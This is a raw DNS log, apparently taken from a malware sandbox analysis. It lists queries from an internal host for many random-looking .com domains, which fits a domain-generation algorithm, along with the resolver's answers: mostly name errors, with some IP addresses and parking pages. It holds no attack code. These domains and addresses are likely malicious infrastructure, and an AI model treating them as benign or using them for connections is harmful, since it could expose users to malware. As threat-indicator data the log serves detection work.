                                                                                                                                                                                                              Nov 11, 2024 18:35:02.406598091 CET192.168.2.81.1.1.10xa2ebStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.406598091 CET192.168.2.81.1.1.10xe0efStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.407211065 CET192.168.2.81.1.1.10xb984Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.407759905 CET192.168.2.81.1.1.10xe6dcStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.408437967 CET192.168.2.81.1.1.10xc35eStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.428397894 CET192.168.2.81.1.1.10x2734Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.434709072 CET192.168.2.81.1.1.10x1116Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.435902119 CET192.168.2.81.1.1.10x4f81Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.442678928 CET192.168.2.81.1.1.10x6dd3Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.445956945 CET192.168.2.81.1.1.10xe09cStandard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.447927952 CET192.168.2.81.1.1.10x3f41Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.454739094 CET192.168.2.81.1.1.10x480cStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.454739094 CET192.168.2.81.1.1.10x36f6Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.456435919 CET192.168.2.81.1.1.10xc398Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.459563971 CET192.168.2.81.1.1.10xa324Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.459563971 CET192.168.2.81.1.1.10x52a9Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.460438967 CET192.168.2.81.1.1.10x2d55Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.462922096 CET192.168.2.81.1.1.10xdb3fStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.462922096 CET192.168.2.81.1.1.10x4582Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.463291883 CET192.168.2.81.1.1.10xd0f9Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.463651896 CET192.168.2.81.1.1.10xe72dStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.466969013 CET192.168.2.81.1.1.10x48fdStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.466969013 CET192.168.2.81.1.1.10xb37cStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.467242002 CET192.168.2.81.1.1.10x5160Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.467536926 CET192.168.2.81.1.1.10xd19Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.468502045 CET192.168.2.81.1.1.10x5755Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.468852997 CET192.168.2.81.1.1.10xc083Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.468972921 CET192.168.2.81.1.1.10xc680Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.469321966 CET192.168.2.81.1.1.10xb728Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.103965044 CET192.168.2.81.1.1.10x2feStandard query (0)www.gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.397430897 CET192.168.2.81.1.1.10xa35aStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.094412088 CET1.1.1.1192.168.2.80x719dName error (3)vojyjof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.094424963 CET1.1.1.1192.168.2.80xfe69Name error (3)purycap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.094434023 CET1.1.1.1192.168.2.80x6177Name error (3)gacyryw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358254910 CET1.1.1.1192.168.2.80xe306Name error (3)vowycac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358294010 CET1.1.1.1192.168.2.80xb772No error (0)qegyhig.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358294010 CET1.1.1.1192.168.2.80xb772No error (0)qegyhig.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358465910 CET1.1.1.1192.168.2.80xce8cNo error (0)vojyqem.com77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358465910 CET1.1.1.1192.168.2.80xce8cNo error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358477116 CET1.1.1.1192.168.2.80x70ebNo error (0)lyvyxor.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358489990 CET1.1.1.1192.168.2.80x346cNo error (0)galyqaz.com199.191.50.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358613968 CET1.1.1.1192.168.2.80xfe10No error (0)lymyxid.com3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.363655090 CET1.1.1.1192.168.2.80xbf5bName error (3)lygygin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.371658087 CET1.1.1.1192.168.2.80x46b0Name error (3)gaqycos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.384623051 CET1.1.1.1192.168.2.80x8ab5Name error (3)pufygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.387573004 CET1.1.1.1192.168.2.80x9f1cName error (3)qexyryl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.411181927 CET1.1.1.1192.168.2.80xbbcbName error (3)galykes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.412806988 CET1.1.1.1192.168.2.80x22ddName error (3)qedynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.416505098 CET1.1.1.1192.168.2.80x857fName error (3)volykyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.420104980 CET1.1.1.1192.168.2.80x6689Name error (3)pumypog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434495926 CET1.1.1.1192.168.2.80xce15Name error (3)vofymik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.435350895 CET1.1.1.1192.168.2.80x5e94Name error (3)qekykev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441747904 CET1.1.1.1192.168.2.80x3deaNo error (0)gatyfus.com178.162.217.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441747904 CET1.1.1.1192.168.2.80x3deaNo error (0)gatyfus.com5.79.71.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441747904 CET1.1.1.1192.168.2.80x3deaNo error (0)gatyfus.com5.79.71.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441747904 CET1.1.1.1192.168.2.80x3deaNo error (0)gatyfus.com85.17.31.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441747904 CET1.1.1.1192.168.2.80x3deaNo error (0)gatyfus.com85.17.31.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441747904 CET1.1.1.1192.168.2.80x3deaNo error (0)gatyfus.com178.162.203.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441747904 CET1.1.1.1192.168.2.80x3deaNo error (0)gatyfus.com178.162.203.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441747904 CET1.1.1.1192.168.2.80x3deaNo error (0)gatyfus.com178.162.203.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.443814039 CET1.1.1.1192.168.2.80x9cf7Name error (3)ganypih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.444550037 CET1.1.1.1192.168.2.80x9ed8Name error (3)lysynur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.444562912 CET1.1.1.1192.168.2.80x46a4Name error (3)qexylup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.445066929 CET1.1.1.1192.168.2.80xb648Name error (3)vowydef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.445087910 CET1.1.1.1192.168.2.80x73feName error (3)lymysan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.445099115 CET1.1.1.1192.168.2.80x85Name error (3)purydyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.445921898 CET1.1.1.1192.168.2.80x286bName error (3)pupybul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.446999073 CET1.1.1.1192.168.2.80xd92cName error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.447137117 CET1.1.1.1192.168.2.80x6a76Name error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.448908091 CET1.1.1.1192.168.2.80xd28aName error (3)pufymoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.452825069 CET1.1.1.1192.168.2.80x9d6cName error (3)lykyjad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.454766989 CET1.1.1.1192.168.2.80xcc6fName error (3)gaqydeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.456685066 CET1.1.1.1192.168.2.80xd9baName error (3)gatyvyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.463071108 CET1.1.1.1192.168.2.80xf57dName error (3)lyvytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.466496944 CET1.1.1.1192.168.2.80x201eName error (3)qebytiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.467578888 CET1.1.1.1192.168.2.80x2dd5Name error (3)qeqysag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.468395948 CET1.1.1.1192.168.2.80x4d11Name error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.469156981 CET1.1.1.1192.168.2.80xf707Name error (3)lygymoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.469317913 CET1.1.1.1192.168.2.80xef35Name error (3)vopybyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.473263979 CET1.1.1.1192.168.2.80xcf34Name error (3)qekyqop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.473299026 CET1.1.1.1192.168.2.80x3647Name error (3)puvyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.642489910 CET1.1.1.1192.168.2.80xe1cfNo error (0)puzylyp.com75.2.71.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.642489910 CET1.1.1.1192.168.2.80xe1cfNo error (0)puzylyp.com99.83.170.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.659029961 CET1.1.1.1192.168.2.80x81c7No error (0)qetyfuv.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.946527004 CET1.1.1.1192.168.2.80x7966No error (0)www.gahyqah.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.946527004 CET1.1.1.1192.168.2.80x7966No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.956923962 CET1.1.1.1192.168.2.80x37f6No error (0)vonypom.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.157422066 CET1.1.1.1192.168.2.80xf4dNo error (0)vocyzit.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.652175903 CET1.1.1.1192.168.2.80xdc1cNo error (0)gadyniw.com154.212.231.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.655107021 CET1.1.1.1192.168.2.80xdc1cNo error (0)gadyniw.com154.212.231.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.450493097 CET1.1.1.1192.168.2.80x516cNo error (0)pupydeq.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.450493097 CET1.1.1.1192.168.2.80x516cNo error (0)pupydeq.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.455068111 CET1.1.1.1192.168.2.80xd95cName error (3)lykymox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.455080032 CET1.1.1.1192.168.2.80x2405Name error (3)ganyzub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.455523968 CET1.1.1.1192.168.2.80xace2Name error (3)vopydek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.461519003 CET1.1.1.1192.168.2.80x484bName error (3)pujymip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.467819929 CET1.1.1.1192.168.2.80x2d9aName error (3)vocykem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.478562117 CET1.1.1.1192.168.2.80x4b62Name error (3)qebylug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.486226082 CET1.1.1.1192.168.2.80x4f61Name error (3)lyvylyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.486803055 CET1.1.1.1192.168.2.80x6bfbName error (3)vojymic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.488068104 CET1.1.1.1192.168.2.80xfe58Name error (3)gahynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.530138969 CET1.1.1.1192.168.2.80xeb9cName error (3)vofybyf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.539537907 CET1.1.1.1192.168.2.80xa6c5Name error (3)puzyjoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.546624899 CET1.1.1.1192.168.2.80x4e16Name error (3)puzymig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.554565907 CET1.1.1.1192.168.2.80x1064Name error (3)pufybyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.558063030 CET1.1.1.1192.168.2.80x2580Name error (3)vowypit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.558130980 CET1.1.1.1192.168.2.80xc023Name error (3)lymytux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.562494993 CET1.1.1.1192.168.2.80x2a79Name error (3)lyxyjaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.566262960 CET1.1.1.1192.168.2.80x93c0Name error (3)qexykaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.578181028 CET1.1.1.1192.168.2.80xd09eName error (3)qegynuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.582663059 CET1.1.1.1192.168.2.80xcdb8Name error (3)purypol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.583641052 CET1.1.1.1192.168.2.80xec8bName error (3)gacykeh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.593291044 CET1.1.1.1192.168.2.80x87fName error (3)gadyveb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.600289106 CET1.1.1.1192.168.2.80xe4feName error (3)gaqypiz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.407520056 CET1.1.1.1192.168.2.80x6abfNo error (0)ww25.lyxynyx.com77026.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.407520056 CET1.1.1.1192.168.2.80x6abfNo error (0)77026.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.227894068 CET1.1.1.1192.168.2.80xd332Name error (3)gacyvah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.227972984 CET1.1.1.1192.168.2.80x8aa1Name error (3)gahypus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.245404959 CET1.1.1.1192.168.2.80xae99Name error (3)vocybam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.246500969 CET1.1.1.1192.168.2.80xadd7Name error (3)puvybeg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.247508049 CET1.1.1.1192.168.2.80xa550Name error (3)puryjil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.248539925 CET1.1.1.1192.168.2.80x47e4Name error (3)qegytyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.257874966 CET1.1.1.1192.168.2.80x13a2Name error (3)qetykol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.260128021 CET1.1.1.1192.168.2.80x5eb4Name error (3)lyryjir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.268464088 CET1.1.1.1192.168.2.80xb9cbName error (3)qegyxug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.269536972 CET1.1.1.1192.168.2.80xddcdName error (3)purywop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.270144939 CET1.1.1.1192.168.2.80x79ecName error (3)ganynyb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.270184040 CET1.1.1.1192.168.2.80x82f6Name error (3)lykysix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.272039890 CET1.1.1.1192.168.2.80x2639Name error (3)pupylaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.274262905 CET1.1.1.1192.168.2.80x1183Name error (3)lysylej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.275569916 CET1.1.1.1192.168.2.80x57dName error (3)galydoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.281862974 CET1.1.1.1192.168.2.80xf871Name error (3)qekysip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.282887936 CET1.1.1.1192.168.2.80xee36Name error (3)lysytyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.283982038 CET1.1.1.1192.168.2.80x1195Name error (3)pujypup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.285777092 CET1.1.1.1192.168.2.80xd1bdName error (3)qeqyqiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.288202047 CET1.1.1.1192.168.2.80xcf0bName error (3)lyvynen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.303195953 CET1.1.1.1192.168.2.80xade6Name error (3)lygyxun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.307297945 CET1.1.1.1192.168.2.80x72a4Name error (3)puvygyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.308449030 CET1.1.1.1192.168.2.80x1055Name error (3)gaqyqis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.309082985 CET1.1.1.1192.168.2.80x6b89Name error (3)puzydal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.310199022 CET1.1.1.1192.168.2.80xd426Name error (3)gadyzyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.310235977 CET1.1.1.1192.168.2.80xd0eaName error (3)lyvyguj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.317286968 CET1.1.1.1192.168.2.80x5c9eName error (3)gahycib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.324820995 CET1.1.1.1192.168.2.80xd6cbName error (3)vojypuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.325997114 CET1.1.1.1192.168.2.80x60caName error (3)gacyfew.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.328062057 CET1.1.1.1192.168.2.80x5570Name error (3)vofypuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.328178883 CET1.1.1.1192.168.2.80x8b1eName error (3)pumyjig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.330039024 CET1.1.1.1192.168.2.80xf4dcName error (3)puzybep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.330060005 CET1.1.1.1192.168.2.80x893eName error (3)gadypuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.330157042 CET1.1.1.1192.168.2.80x8fa7Name error (3)qekyvav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.330167055 CET1.1.1.1192.168.2.80xe62aName error (3)qedytul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.331155062 CET1.1.1.1192.168.2.80x5128Name error (3)gatyrez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.331775904 CET1.1.1.1192.168.2.80x998bName error (3)qebyhuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.331826925 CET1.1.1.1192.168.2.80x89cfName error (3)vopykak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.331990957 CET1.1.1.1192.168.2.80xdf85Name error (3)vojycif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.332048893 CET1.1.1.1192.168.2.80xe2c0Name error (3)lyxyfar.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.332089901 CET1.1.1.1192.168.2.80x6219Name error (3)vocygyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.333441019 CET1.1.1.1192.168.2.80x7dceName error (3)lyrywax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.333479881 CET1.1.1.1192.168.2.80x5122Name error (3)volybec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.334302902 CET1.1.1.1192.168.2.80x5d6fName error (3)lymymud.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.334768057 CET1.1.1.1192.168.2.80x55dfName error (3)ganyhuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.334831953 CET1.1.1.1192.168.2.80xf8c9Name error (3)qetyrap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.334949970 CET1.1.1.1192.168.2.80x5053Name error (3)vofyzym.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.335177898 CET1.1.1.1192.168.2.80x5879Name error (3)pujycov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.336159945 CET1.1.1.1192.168.2.80x6d12Name error (3)qedyleq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.336219072 CET1.1.1.1192.168.2.80x501aName error (3)volydot.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.336421013 CET1.1.1.1192.168.2.80x6c1bName error (3)qebynyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.336500883 CET1.1.1.1192.168.2.80xb66Name error (3)pupytyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.337225914 CET1.1.1.1192.168.2.80xc48aName error (3)pumymuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.341603994 CET1.1.1.1192.168.2.80x6803Name error (3)vonyjim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.341918945 CET1.1.1.1192.168.2.80x9ebaName error (3)vowyqoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.349159956 CET1.1.1.1192.168.2.80xcd6Name error (3)vopyret.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.349595070 CET1.1.1.1192.168.2.80x5399Name error (3)qeqykog.comnonenoneA (IP address)IN (0x0001)false
